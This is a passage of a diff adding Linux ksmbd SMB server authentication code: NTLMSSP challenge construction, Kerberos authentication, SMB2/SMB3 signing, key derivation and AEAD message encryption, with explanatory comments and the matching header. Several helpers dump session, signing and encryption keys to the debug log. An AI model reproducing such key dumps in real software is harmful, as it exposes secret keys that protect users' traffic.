++ * ksmbd_build_ntlmssp_challenge_blob() - helper function to construct
++ * challenge blob
++ * @chgblob:	challenge blob source pointer to initialize
++ * @conn:	connection
++ *
++ */
++unsigned int
++ksmbd_build_ntlmssp_challenge_blob(struct challenge_message *chgblob,
++				   struct ksmbd_conn *conn)
++{
++	struct target_info *tinfo;
++	wchar_t *name;
++	__u8 *target_name;
++	unsigned int flags, blob_off, blob_len, type, target_info_len = 0;
++	int len, uni_len, conv_len;
++	int cflags = conn->ntlmssp.client_flags;
++
++	memcpy(chgblob->Signature, NTLMSSP_SIGNATURE, 8);
++	chgblob->MessageType = NtLmChallenge;
++
++	flags = NTLMSSP_NEGOTIATE_UNICODE |
++		NTLMSSP_NEGOTIATE_NTLM | NTLMSSP_TARGET_TYPE_SERVER |
++		NTLMSSP_NEGOTIATE_TARGET_INFO;
++
++	if (cflags & NTLMSSP_NEGOTIATE_SIGN) {
++		flags |= NTLMSSP_NEGOTIATE_SIGN;
++		flags |= cflags & (NTLMSSP_NEGOTIATE_128 |
++				   NTLMSSP_NEGOTIATE_56);
++	}
++
++	if (cflags & NTLMSSP_NEGOTIATE_SEAL && smb3_encryption_negotiated(conn))
++		flags |= NTLMSSP_NEGOTIATE_SEAL;
++
++	if (cflags & NTLMSSP_NEGOTIATE_ALWAYS_SIGN)
++		flags |= NTLMSSP_NEGOTIATE_ALWAYS_SIGN;
++
++	if (cflags & NTLMSSP_REQUEST_TARGET)
++		flags |= NTLMSSP_REQUEST_TARGET;
++
++	if (conn->use_spnego &&
++	    (cflags & NTLMSSP_NEGOTIATE_EXTENDED_SEC))
++		flags |= NTLMSSP_NEGOTIATE_EXTENDED_SEC;
++
++	if (cflags & NTLMSSP_NEGOTIATE_KEY_XCH)
++		flags |= NTLMSSP_NEGOTIATE_KEY_XCH;
++
++	chgblob->NegotiateFlags = cpu_to_le32(flags);
++	len = strlen(ksmbd_netbios_name());
++	name = kmalloc(2 + UNICODE_LEN(len), GFP_KERNEL);
++	if (!name)
++		return -ENOMEM;
++
++	conv_len = smb_strtoUTF16((__le16 *)name, ksmbd_netbios_name(), len,
++				  conn->local_nls);
++	if (conv_len < 0 || conv_len > len) {
++		kfree(name);
++		return -EINVAL;
++	}
++
++	uni_len = UNICODE_LEN(conv_len);
++
++	blob_off = sizeof(struct challenge_message);
++	blob_len = blob_off + uni_len;
++
++	chgblob->TargetName.Length = cpu_to_le16(uni_len);
++	chgblob->TargetName.MaximumLength = cpu_to_le16(uni_len);
++	chgblob->TargetName.BufferOffset = cpu_to_le32(blob_off);
++
++	/* Initialize random conn challenge */
++	get_random_bytes(conn->ntlmssp.cryptkey, sizeof(__u64));
++	memcpy(chgblob->Challenge, conn->ntlmssp.cryptkey,
++	       CIFS_CRYPTO_KEY_SIZE);
++
++	/* Add Target Information to security buffer */
++	chgblob->TargetInfoArray.BufferOffset = cpu_to_le32(blob_len);
++
++	target_name = (__u8 *)chgblob + blob_off;
++	memcpy(target_name, name, uni_len);
++	tinfo = (struct target_info *)(target_name + uni_len);
++
++	chgblob->TargetInfoArray.Length = 0;
++	/* Add target info list for NetBIOS/DNS settings */
++	for (type = NTLMSSP_AV_NB_COMPUTER_NAME;
++	     type <= NTLMSSP_AV_DNS_DOMAIN_NAME; type++) {
++		tinfo->Type = cpu_to_le16(type);
++		tinfo->Length = cpu_to_le16(uni_len);
++		memcpy(tinfo->Content, name, uni_len);
++		tinfo = (struct target_info *)((char *)tinfo + 4 + uni_len);
++		target_info_len += 4 + uni_len;
++	}
++
++	/* Add terminator subblock */
++	tinfo->Type = 0;
++	tinfo->Length = 0;
++	target_info_len += 4;
++
++	chgblob->TargetInfoArray.Length = cpu_to_le16(target_info_len);
++	chgblob->TargetInfoArray.MaximumLength = cpu_to_le16(target_info_len);
++	blob_len += target_info_len;
++	kfree(name);
++	ksmbd_debug(AUTH, "NTLMSSP SecurityBufferLength %d\n", blob_len);
++	return blob_len;
++}
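++
++/*
++ * Shape of each AV_PAIR appended above (a sketch matching the
++ * 4 + uni_len arithmetic; field names follow MS-NLMP 2.2.2.1):
++ *
++ *   __le16 AvId;    e.g. NTLMSSP_AV_NB_COMPUTER_NAME
++ *   __le16 AvLen;   length of Value in bytes
++ *   u8     Value[]; AvLen bytes of UTF-16LE data
++ *
++ * The list ends with an MsvAvEOL pair (AvId = 0, AvLen = 0), which is
++ * why the terminator contributes exactly 4 bytes.
++ */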
++
++#ifdef CONFIG_SMB_SERVER_KERBEROS5
++int ksmbd_krb5_authenticate(struct ksmbd_session *sess, char *in_blob,
++			    int in_len, char *out_blob, int *out_len)
++{
++	struct ksmbd_spnego_authen_response *resp;
++	struct ksmbd_user *user = NULL;
++	int retval;
++
++	resp = ksmbd_ipc_spnego_authen_request(in_blob, in_len);
++	if (!resp) {
++		ksmbd_debug(AUTH, "SPNEGO_AUTHEN_REQUEST failure\n");
++		return -EINVAL;
++	}
++
++	if (!(resp->login_response.status & KSMBD_USER_FLAG_OK)) {
++		ksmbd_debug(AUTH, "krb5 authentication failure\n");
++		retval = -EPERM;
++		goto out;
++	}
++
++	if (*out_len <= resp->spnego_blob_len) {
++		ksmbd_debug(AUTH, "buf len %d, but blob len %d\n",
++			    *out_len, resp->spnego_blob_len);
++		retval = -EINVAL;
++		goto out;
++	}
++
++	if (resp->session_key_len > sizeof(sess->sess_key)) {
++		ksmbd_debug(AUTH, "session key is too long\n");
++		retval = -EINVAL;
++		goto out;
++	}
++
++	user = ksmbd_alloc_user(&resp->login_response);
++	if (!user) {
++		ksmbd_debug(AUTH, "login failure\n");
++		retval = -ENOMEM;
++		goto out;
++	}
++	sess->user = user;
++
++	memcpy(sess->sess_key, resp->payload, resp->session_key_len);
++	memcpy(out_blob, resp->payload + resp->session_key_len,
++	       resp->spnego_blob_len);
++	*out_len = resp->spnego_blob_len;
++	retval = 0;
++out:
++	kvfree(resp);
++	return retval;
++}
++#else
++int ksmbd_krb5_authenticate(struct ksmbd_session *sess, char *in_blob,
++			    int in_len, char *out_blob, int *out_len)
++{
++	return -EOPNOTSUPP;
++}
++#endif
++
++/**
++ * ksmbd_sign_smb2_pdu() - function to generate packet signing
++ * @conn:	connection
++ * @key:	signing key
++ * @iov:        buffer iov array
++ * @n_vec:	number of iovecs
++ * @sig:	signature value generated for client request packet
++ *
++ */
++int ksmbd_sign_smb2_pdu(struct ksmbd_conn *conn, char *key, struct kvec *iov,
++			int n_vec, char *sig)
++{
++	struct ksmbd_crypto_ctx *ctx;
++	int rc, i;
++
++	ctx = ksmbd_crypto_ctx_find_hmacsha256();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
++		return -ENOMEM;
++	}
++
++	rc = crypto_shash_setkey(CRYPTO_HMACSHA256_TFM(ctx),
++				 key,
++				 SMB2_NTLMV2_SESSKEY_SIZE);
++	if (rc)
++		goto out;
++
++	rc = crypto_shash_init(CRYPTO_HMACSHA256(ctx));
++	if (rc) {
++		ksmbd_debug(AUTH, "hmacsha256 init error %d\n", rc);
++		goto out;
++	}
++
++	for (i = 0; i < n_vec; i++) {
++		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx),
++					 iov[i].iov_base,
++					 iov[i].iov_len);
++		if (rc) {
++			ksmbd_debug(AUTH, "hmacsha256 update error %d\n", rc);
++			goto out;
++		}
++	}
++
++	rc = crypto_shash_final(CRYPTO_HMACSHA256(ctx), sig);
++	if (rc)
++		ksmbd_debug(AUTH, "hmacsha256 generation error %d\n", rc);
++out:
++	ksmbd_release_crypto_ctx(ctx);
++	return rc;
++}
++
++/**
++ * ksmbd_sign_smb3_pdu() - function to generate packet signing
++ * @conn:	connection
++ * @key:	signing key
++ * @iov:        buffer iov array
++ * @n_vec:	number of iovecs
++ * @sig:	signature value generated for client request packet
++ *
++ */
++int ksmbd_sign_smb3_pdu(struct ksmbd_conn *conn, char *key, struct kvec *iov,
++			int n_vec, char *sig)
++{
++	struct ksmbd_crypto_ctx *ctx;
++	int rc, i;
++
++	ctx = ksmbd_crypto_ctx_find_cmacaes();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "could not crypto alloc cmac\n");
++		return -ENOMEM;
++	}
++
++	rc = crypto_shash_setkey(CRYPTO_CMACAES_TFM(ctx),
++				 key,
++				 SMB2_CMACAES_SIZE);
++	if (rc)
++		goto out;
++
++	rc = crypto_shash_init(CRYPTO_CMACAES(ctx));
++	if (rc) {
++		ksmbd_debug(AUTH, "cmaces init error %d\n", rc);
++		goto out;
++	}
++
++	for (i = 0; i < n_vec; i++) {
++		rc = crypto_shash_update(CRYPTO_CMACAES(ctx),
++					 iov[i].iov_base,
++					 iov[i].iov_len);
++		if (rc) {
++			ksmbd_debug(AUTH, "cmaces update error %d\n", rc);
++			goto out;
++		}
++	}
++
++	rc = crypto_shash_final(CRYPTO_CMACAES(ctx), sig);
++	if (rc)
++		ksmbd_debug(AUTH, "cmaces generation error %d\n", rc);
++out:
++	ksmbd_release_crypto_ctx(ctx);
++	return rc;
++}
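++
++/*
++ * For both signing helpers above the usual MS-SMB2 convention is
++ * assumed: the caller zeroes the 16-byte Signature field first, the
++ * digest (HMAC-SHA256 for SMB2, AES-128-CMAC for SMB3) is computed
++ * over the whole PDU, and its first 16 bytes become the signature.
++ */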
++
++struct derivation {
++	struct kvec label;
++	struct kvec context;
++	bool binding;
++};
++
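++/*
++ * A sketch of the derivation below, assuming the SP800-108 KDF in
++ * counter mode as SMB3 uses it (a single iteration, since the output
++ * fits in one HMAC-SHA256 block):
++ *
++ *   Key = HMAC-SHA256(SessionKey, i || Label || 0x00 || Context || L)
++ *
++ * with i = 0x00000001 and L = 128 or 256 depending on the cipher.
++ */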
++static int generate_key(struct ksmbd_conn *conn, struct ksmbd_session *sess,
++			struct kvec label, struct kvec context, __u8 *key,
++			unsigned int key_size)
++{
++	unsigned char zero = 0x0;
++	__u8 i[4] = {0, 0, 0, 1};
++	__u8 L128[4] = {0, 0, 0, 128};
++	__u8 L256[4] = {0, 0, 1, 0};
++	int rc;
++	unsigned char prfhash[SMB2_HMACSHA256_SIZE];
++	unsigned char *hashptr = prfhash;
++	struct ksmbd_crypto_ctx *ctx;
++
++	memset(prfhash, 0x0, SMB2_HMACSHA256_SIZE);
++	memset(key, 0x0, key_size);
++
++	ctx = ksmbd_crypto_ctx_find_hmacsha256();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
++		return -ENOMEM;
++	}
++
++	rc = crypto_shash_setkey(CRYPTO_HMACSHA256_TFM(ctx),
++				 sess->sess_key,
++				 SMB2_NTLMV2_SESSKEY_SIZE);
++	if (rc)
++		goto smb3signkey_ret;
++
++	rc = crypto_shash_init(CRYPTO_HMACSHA256(ctx));
++	if (rc) {
++		ksmbd_debug(AUTH, "hmacsha256 init error %d\n", rc);
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), i, 4);
++	if (rc) {
++		ksmbd_debug(AUTH, "could not update with n\n");
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx),
++				 label.iov_base,
++				 label.iov_len);
++	if (rc) {
++		ksmbd_debug(AUTH, "could not update with label\n");
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), &zero, 1);
++	if (rc) {
++		ksmbd_debug(AUTH, "could not update with zero\n");
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx),
++				 context.iov_base,
++				 context.iov_len);
++	if (rc) {
++		ksmbd_debug(AUTH, "could not update with context\n");
++		goto smb3signkey_ret;
++	}
++
++	if (key_size == SMB3_ENC_DEC_KEY_SIZE &&
++	    (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
++	     conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM))
++		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), L256, 4);
++	else
++		rc = crypto_shash_update(CRYPTO_HMACSHA256(ctx), L128, 4);
++	if (rc) {
++		ksmbd_debug(AUTH, "could not update with L\n");
++		goto smb3signkey_ret;
++	}
++
++	rc = crypto_shash_final(CRYPTO_HMACSHA256(ctx), hashptr);
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not generate hmacmd5 hash error %d\n",
++			    rc);
++		goto smb3signkey_ret;
++	}
++
++	memcpy(key, hashptr, key_size);
++
++smb3signkey_ret:
++	ksmbd_release_crypto_ctx(ctx);
++	return rc;
++}
++
++static int generate_smb3signingkey(struct ksmbd_session *sess,
++				   struct ksmbd_conn *conn,
++				   const struct derivation *signing)
++{
++	int rc;
++	struct channel *chann;
++	char *key;
++
++	chann = lookup_chann_list(sess, conn);
++	if (!chann)
++		return 0;
++
++	if (conn->dialect >= SMB30_PROT_ID && signing->binding)
++		key = chann->smb3signingkey;
++	else
++		key = sess->smb3signingkey;
++
++	rc = generate_key(conn, sess, signing->label, signing->context, key,
++			  SMB3_SIGN_KEY_SIZE);
++	if (rc)
++		return rc;
++
++	if (!(conn->dialect >= SMB30_PROT_ID && signing->binding))
++		memcpy(chann->smb3signingkey, key, SMB3_SIGN_KEY_SIZE);
++
++	ksmbd_debug(AUTH, "dumping generated AES signing keys\n");
++	ksmbd_debug(AUTH, "Session Id    %llu\n", sess->id);
++	ksmbd_debug(AUTH, "Session Key   %*ph\n",
++		    SMB2_NTLMV2_SESSKEY_SIZE, sess->sess_key);
++	ksmbd_debug(AUTH, "Signing Key   %*ph\n",
++		    SMB3_SIGN_KEY_SIZE, key);
++	return 0;
++}
++
++int ksmbd_gen_smb30_signingkey(struct ksmbd_session *sess,
++			       struct ksmbd_conn *conn)
++{
++	struct derivation d;
++
++	d.label.iov_base = "SMB2AESCMAC";
++	d.label.iov_len = 12;
++	d.context.iov_base = "SmbSign";
++	d.context.iov_len = 8;
++	d.binding = conn->binding;
++
++	return generate_smb3signingkey(sess, conn, &d);
++}
++
++int ksmbd_gen_smb311_signingkey(struct ksmbd_session *sess,
++				struct ksmbd_conn *conn)
++{
++	struct derivation d;
++
++	d.label.iov_base = "SMBSigningKey";
++	d.label.iov_len = 14;
++	if (conn->binding) {
++		struct preauth_session *preauth_sess;
++
++		preauth_sess = ksmbd_preauth_session_lookup(conn, sess->id);
++		if (!preauth_sess)
++			return -ENOENT;
++		d.context.iov_base = preauth_sess->Preauth_HashValue;
++	} else {
++		d.context.iov_base = sess->Preauth_HashValue;
++	}
++	d.context.iov_len = 64;
++	d.binding = conn->binding;
++
++	return generate_smb3signingkey(sess, conn, &d);
++}
++
++struct derivation_twin {
++	struct derivation encryption;
++	struct derivation decryption;
++};
++
++static int generate_smb3encryptionkey(struct ksmbd_conn *conn,
++				      struct ksmbd_session *sess,
++				      const struct derivation_twin *ptwin)
++{
++	int rc;
++
++	rc = generate_key(conn, sess, ptwin->encryption.label,
++			  ptwin->encryption.context, sess->smb3encryptionkey,
++			  SMB3_ENC_DEC_KEY_SIZE);
++	if (rc)
++		return rc;
++
++	rc = generate_key(conn, sess, ptwin->decryption.label,
++			  ptwin->decryption.context,
++			  sess->smb3decryptionkey, SMB3_ENC_DEC_KEY_SIZE);
++	if (rc)
++		return rc;
++
++	ksmbd_debug(AUTH, "dumping generated AES encryption keys\n");
++	ksmbd_debug(AUTH, "Cipher type   %d\n", conn->cipher_type);
++	ksmbd_debug(AUTH, "Session Id    %llu\n", sess->id);
++	ksmbd_debug(AUTH, "Session Key   %*ph\n",
++		    SMB2_NTLMV2_SESSKEY_SIZE, sess->sess_key);
++	if (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
++	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM) {
++		ksmbd_debug(AUTH, "ServerIn Key  %*ph\n",
++			    SMB3_GCM256_CRYPTKEY_SIZE, sess->smb3encryptionkey);
++		ksmbd_debug(AUTH, "ServerOut Key %*ph\n",
++			    SMB3_GCM256_CRYPTKEY_SIZE, sess->smb3decryptionkey);
++	} else {
++		ksmbd_debug(AUTH, "ServerIn Key  %*ph\n",
++			    SMB3_GCM128_CRYPTKEY_SIZE, sess->smb3encryptionkey);
++		ksmbd_debug(AUTH, "ServerOut Key %*ph\n",
++			    SMB3_GCM128_CRYPTKEY_SIZE, sess->smb3decryptionkey);
++	}
++	return 0;
++}
++
++int ksmbd_gen_smb30_encryptionkey(struct ksmbd_conn *conn,
++				  struct ksmbd_session *sess)
++{
++	struct derivation_twin twin;
++	struct derivation *d;
++
++	d = &twin.encryption;
++	d->label.iov_base = "SMB2AESCCM";
++	d->label.iov_len = 11;
++	d->context.iov_base = "ServerOut";
++	d->context.iov_len = 10;
++
++	d = &twin.decryption;
++	d->label.iov_base = "SMB2AESCCM";
++	d->label.iov_len = 11;
++	d->context.iov_base = "ServerIn ";
++	d->context.iov_len = 10;
++
++	return generate_smb3encryptionkey(conn, sess, &twin);
++}
++
++int ksmbd_gen_smb311_encryptionkey(struct ksmbd_conn *conn,
++				   struct ksmbd_session *sess)
++{
++	struct derivation_twin twin;
++	struct derivation *d;
++
++	d = &twin.encryption;
++	d->label.iov_base = "SMBS2CCipherKey";
++	d->label.iov_len = 16;
++	d->context.iov_base = sess->Preauth_HashValue;
++	d->context.iov_len = 64;
++
++	d = &twin.decryption;
++	d->label.iov_base = "SMBC2SCipherKey";
++	d->label.iov_len = 16;
++	d->context.iov_base = sess->Preauth_HashValue;
++	d->context.iov_len = 64;
++
++	return generate_smb3encryptionkey(conn, sess, &twin);
++}
++
++int ksmbd_gen_preauth_integrity_hash(struct ksmbd_conn *conn, char *buf,
++				     __u8 *pi_hash)
++{
++	int rc;
++	struct smb2_hdr *rcv_hdr = smb2_get_msg(buf);
++	char *all_bytes_msg = (char *)&rcv_hdr->ProtocolId;
++	int msg_size = get_rfc1002_len(buf);
++	struct ksmbd_crypto_ctx *ctx = NULL;
++
++	if (conn->preauth_info->Preauth_HashId !=
++	    SMB2_PREAUTH_INTEGRITY_SHA512)
++		return -EINVAL;
++
++	ctx = ksmbd_crypto_ctx_find_sha512();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "could not alloc sha512\n");
++		return -ENOMEM;
++	}
++
++	rc = crypto_shash_init(CRYPTO_SHA512(ctx));
++	if (rc) {
++		ksmbd_debug(AUTH, "could not init shashn");
++		goto out;
++	}
++
++	rc = crypto_shash_update(CRYPTO_SHA512(ctx), pi_hash, 64);
++	if (rc) {
++		ksmbd_debug(AUTH, "could not update with n\n");
++		goto out;
++	}
++
++	rc = crypto_shash_update(CRYPTO_SHA512(ctx), all_bytes_msg, msg_size);
++	if (rc) {
++		ksmbd_debug(AUTH, "could not update with n\n");
++		goto out;
++	}
++
++	rc = crypto_shash_final(CRYPTO_SHA512(ctx), pi_hash);
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not generate hash err : %d\n", rc);
++		goto out;
++	}
++out:
++	ksmbd_release_crypto_ctx(ctx);
++	return rc;
++}
++
++int ksmbd_gen_sd_hash(struct ksmbd_conn *conn, char *sd_buf, int len,
++		      __u8 *pi_hash)
++{
++	int rc;
++	struct ksmbd_crypto_ctx *ctx = NULL;
++
++	ctx = ksmbd_crypto_ctx_find_sha256();
++	if (!ctx) {
++		ksmbd_debug(AUTH, "could not alloc sha256\n");
++		return -ENOMEM;
++	}
++
++	rc = crypto_shash_init(CRYPTO_SHA256(ctx));
++	if (rc) {
++		ksmbd_debug(AUTH, "could not init shashn");
++		goto out;
++	}
++
++	rc = crypto_shash_update(CRYPTO_SHA256(ctx), sd_buf, len);
++	if (rc) {
++		ksmbd_debug(AUTH, "could not update with n\n");
++		goto out;
++	}
++
++	rc = crypto_shash_final(CRYPTO_SHA256(ctx), pi_hash);
++	if (rc) {
++		ksmbd_debug(AUTH, "Could not generate hash err : %d\n", rc);
++		goto out;
++	}
++out:
++	ksmbd_release_crypto_ctx(ctx);
++	return rc;
++}
++
++static int ksmbd_get_encryption_key(struct ksmbd_work *work, __u64 ses_id,
++				    int enc, u8 *key)
++{
++	struct ksmbd_session *sess;
++	u8 *ses_enc_key;
++
++	if (enc)
++		sess = work->sess;
++	else
++		sess = ksmbd_session_lookup_all(work->conn, ses_id);
++	if (!sess)
++		return -EINVAL;
++
++	ses_enc_key = enc ? sess->smb3encryptionkey :
++		sess->smb3decryptionkey;
++	memcpy(key, ses_enc_key, SMB3_ENC_DEC_KEY_SIZE);
++
++	return 0;
++}
++
++static inline void smb2_sg_set_buf(struct scatterlist *sg, const void *buf,
++				   unsigned int buflen)
++{
++	void *addr;
++
++	if (is_vmalloc_addr(buf))
++		addr = vmalloc_to_page(buf);
++	else
++		addr = virt_to_page(buf);
++	sg_set_page(sg, addr, buflen, offset_in_page(buf));
++}
++
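++/*
++ * Sketch of the scatterlist assembled below (vmalloc'ed buffers expand
++ * to one entry per page, so the middle section may be longer):
++ *
++ *   sg[0]        transform header past its first 24 bytes (assoc data)
++ *   sg[1..n-2]   payload kvecs iov[1..nvec-1]
++ *   sg[n-1]      16-byte signature
++ */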
++static struct scatterlist *ksmbd_init_sg(struct kvec *iov, unsigned int nvec,
++					 u8 *sign)
++{
++	struct scatterlist *sg;
++	unsigned int assoc_data_len = sizeof(struct smb2_transform_hdr) - 20;
++	int i, nr_entries[3] = {0}, total_entries = 0, sg_idx = 0;
++
++	if (!nvec)
++		return NULL;
++
++	for (i = 0; i < nvec - 1; i++) {
++		unsigned long kaddr = (unsigned long)iov[i + 1].iov_base;
++
++		if (is_vmalloc_addr(iov[i + 1].iov_base)) {
++			nr_entries[i] = ((kaddr + iov[i + 1].iov_len +
++					PAGE_SIZE - 1) >> PAGE_SHIFT) -
++				(kaddr >> PAGE_SHIFT);
++		} else {
++			nr_entries[i]++;
++		}
++		total_entries += nr_entries[i];
++	}
++
++	/* Add two entries for transform header and signature */
++	total_entries += 2;
++
++	sg = kmalloc_array(total_entries, sizeof(struct scatterlist), GFP_KERNEL);
++	if (!sg)
++		return NULL;
++
++	sg_init_table(sg, total_entries);
++	smb2_sg_set_buf(&sg[sg_idx++], iov[0].iov_base + 24, assoc_data_len);
++	for (i = 0; i < nvec - 1; i++) {
++		void *data = iov[i + 1].iov_base;
++		int len = iov[i + 1].iov_len;
++
++		if (is_vmalloc_addr(data)) {
++			int j, offset = offset_in_page(data);
++
++			for (j = 0; j < nr_entries[i]; j++) {
++				unsigned int bytes = PAGE_SIZE - offset;
++
++				if (!len)
++					break;
++
++				if (bytes > len)
++					bytes = len;
++
++				sg_set_page(&sg[sg_idx++],
++					    vmalloc_to_page(data), bytes,
++					    offset_in_page(data));
++
++				data += bytes;
++				len -= bytes;
++				offset = 0;
++			}
++		} else {
++			sg_set_page(&sg[sg_idx++], virt_to_page(data), len,
++				    offset_in_page(data));
++		}
++	}
++	smb2_sg_set_buf(&sg[sg_idx], sign, SMB2_SIGNATURE_SIZE);
++	return sg;
++}
++
++int ksmbd_crypt_message(struct ksmbd_work *work, struct kvec *iov,
++			unsigned int nvec, int enc)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_transform_hdr *tr_hdr = smb2_get_msg(iov[0].iov_base);
++	unsigned int assoc_data_len = sizeof(struct smb2_transform_hdr) - 20;
++	int rc;
++	struct scatterlist *sg;
++	u8 sign[SMB2_SIGNATURE_SIZE] = {};
++	u8 key[SMB3_ENC_DEC_KEY_SIZE];
++	struct aead_request *req;
++	char *iv;
++	unsigned int iv_len;
++	struct crypto_aead *tfm;
++	unsigned int crypt_len = le32_to_cpu(tr_hdr->OriginalMessageSize);
++	struct ksmbd_crypto_ctx *ctx;
++
++	rc = ksmbd_get_encryption_key(work,
++				      le64_to_cpu(tr_hdr->SessionId),
++				      enc,
++				      key);
++	if (rc) {
++		pr_err("Could not get %scryption key\n", enc ? "en" : "de");
++		return rc;
++	}
++
++	if (conn->cipher_type == SMB2_ENCRYPTION_AES128_GCM ||
++	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM)
++		ctx = ksmbd_crypto_ctx_find_gcm();
++	else
++		ctx = ksmbd_crypto_ctx_find_ccm();
++	if (!ctx) {
++		pr_err("crypto alloc failed\n");
++		return -ENOMEM;
++	}
++
++	if (conn->cipher_type == SMB2_ENCRYPTION_AES128_GCM ||
++	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM)
++		tfm = CRYPTO_GCM(ctx);
++	else
++		tfm = CRYPTO_CCM(ctx);
++
++	if (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
++	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM)
++		rc = crypto_aead_setkey(tfm, key, SMB3_GCM256_CRYPTKEY_SIZE);
++	else
++		rc = crypto_aead_setkey(tfm, key, SMB3_GCM128_CRYPTKEY_SIZE);
++	if (rc) {
++		pr_err("Failed to set aead key %d\n", rc);
++		goto free_ctx;
++	}
++
++	rc = crypto_aead_setauthsize(tfm, SMB2_SIGNATURE_SIZE);
++	if (rc) {
++		pr_err("Failed to set authsize %d\n", rc);
++		goto free_ctx;
++	}
++
++	req = aead_request_alloc(tfm, GFP_KERNEL);
++	if (!req) {
++		rc = -ENOMEM;
++		goto free_ctx;
++	}
++
++	if (!enc) {
++		memcpy(sign, &tr_hdr->Signature, SMB2_SIGNATURE_SIZE);
++		crypt_len += SMB2_SIGNATURE_SIZE;
++	}
++
++	sg = ksmbd_init_sg(iov, nvec, sign);
++	if (!sg) {
++		pr_err("Failed to init sg\n");
++		rc = -ENOMEM;
++		goto free_req;
++	}
++
++	iv_len = crypto_aead_ivsize(tfm);
++	iv = kzalloc(iv_len, GFP_KERNEL);
++	if (!iv) {
++		rc = -ENOMEM;
++		goto free_sg;
++	}
++
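++	/*
++	 * IV layout sketch, assuming the kernel AEAD conventions: GCM
++	 * consumes the 12-byte nonce directly, while CCM expects a
++	 * 16-byte block [flags = 3][11-byte nonce][4-byte length field],
++	 * so only the flags byte and the nonce are filled in here.
++	 */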
++	if (conn->cipher_type == SMB2_ENCRYPTION_AES128_GCM ||
++	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM) {
++		memcpy(iv, (char *)tr_hdr->Nonce, SMB3_AES_GCM_NONCE);
++	} else {
++		iv[0] = 3;
++		memcpy(iv + 1, (char *)tr_hdr->Nonce, SMB3_AES_CCM_NONCE);
++	}
++
++	aead_request_set_crypt(req, sg, sg, crypt_len, iv);
++	aead_request_set_ad(req, assoc_data_len);
++	aead_request_set_callback(req, CRYPTO_TFM_REQ_MAY_SLEEP, NULL, NULL);
++
++	if (enc)
++		rc = crypto_aead_encrypt(req);
++	else
++		rc = crypto_aead_decrypt(req);
++	if (rc)
++		goto free_iv;
++
++	if (enc)
++		memcpy(&tr_hdr->Signature, sign, SMB2_SIGNATURE_SIZE);
++
++free_iv:
++	kfree(iv);
++free_sg:
++	kfree(sg);
++free_req:
++	kfree(req);
++free_ctx:
++	ksmbd_release_crypto_ctx(ctx);
++	return rc;
++}
+diff --git a/fs/smb/server/auth.h b/fs/smb/server/auth.h
+new file mode 100644
+index 0000000000000..362b6159a6cff
+--- /dev/null
++++ b/fs/smb/server/auth.h
+@@ -0,0 +1,71 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __AUTH_H__
++#define __AUTH_H__
++
++#include "ntlmssp.h"
++
++#ifdef CONFIG_SMB_SERVER_KERBEROS5
++#define AUTH_GSS_LENGTH		96
++#define AUTH_GSS_PADDING	0
++#else
++#define AUTH_GSS_LENGTH		74
++#define AUTH_GSS_PADDING	6
++#endif
++
++#define CIFS_HMAC_MD5_HASH_SIZE	(16)
++#define CIFS_NTHASH_SIZE	(16)
++
++/*
++ * Size of the ntlm client response
++ */
++#define CIFS_AUTH_RESP_SIZE		24
++#define CIFS_SMB1_SIGNATURE_SIZE	8
++#define CIFS_SMB1_SESSKEY_SIZE		16
++
++#define KSMBD_AUTH_NTLMSSP	0x0001
++#define KSMBD_AUTH_KRB5		0x0002
++#define KSMBD_AUTH_MSKRB5	0x0004
++#define KSMBD_AUTH_KRB5U2U	0x0008
++
++struct ksmbd_session;
++struct ksmbd_conn;
++struct ksmbd_work;
++struct kvec;
++
++int ksmbd_crypt_message(struct ksmbd_work *work, struct kvec *iov,
++			unsigned int nvec, int enc);
++void ksmbd_copy_gss_neg_header(void *buf);
++int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
++		      struct ntlmv2_resp *ntlmv2, int blen, char *domain_name,
++		      char *cryptkey);
++int ksmbd_decode_ntlmssp_auth_blob(struct authenticate_message *authblob,
++				   int blob_len, struct ksmbd_conn *conn,
++				   struct ksmbd_session *sess);
++int ksmbd_decode_ntlmssp_neg_blob(struct negotiate_message *negblob,
++				  int blob_len, struct ksmbd_conn *conn);
++unsigned int
++ksmbd_build_ntlmssp_challenge_blob(struct challenge_message *chgblob,
++				   struct ksmbd_conn *conn);
++int ksmbd_krb5_authenticate(struct ksmbd_session *sess, char *in_blob,
++			    int in_len,	char *out_blob, int *out_len);
++int ksmbd_sign_smb2_pdu(struct ksmbd_conn *conn, char *key, struct kvec *iov,
++			int n_vec, char *sig);
++int ksmbd_sign_smb3_pdu(struct ksmbd_conn *conn, char *key, struct kvec *iov,
++			int n_vec, char *sig);
++int ksmbd_gen_smb30_signingkey(struct ksmbd_session *sess,
++			       struct ksmbd_conn *conn);
++int ksmbd_gen_smb311_signingkey(struct ksmbd_session *sess,
++				struct ksmbd_conn *conn);
++int ksmbd_gen_smb30_encryptionkey(struct ksmbd_conn *conn,
++				  struct ksmbd_session *sess);
++int ksmbd_gen_smb311_encryptionkey(struct ksmbd_conn *conn,
++				   struct ksmbd_session *sess);
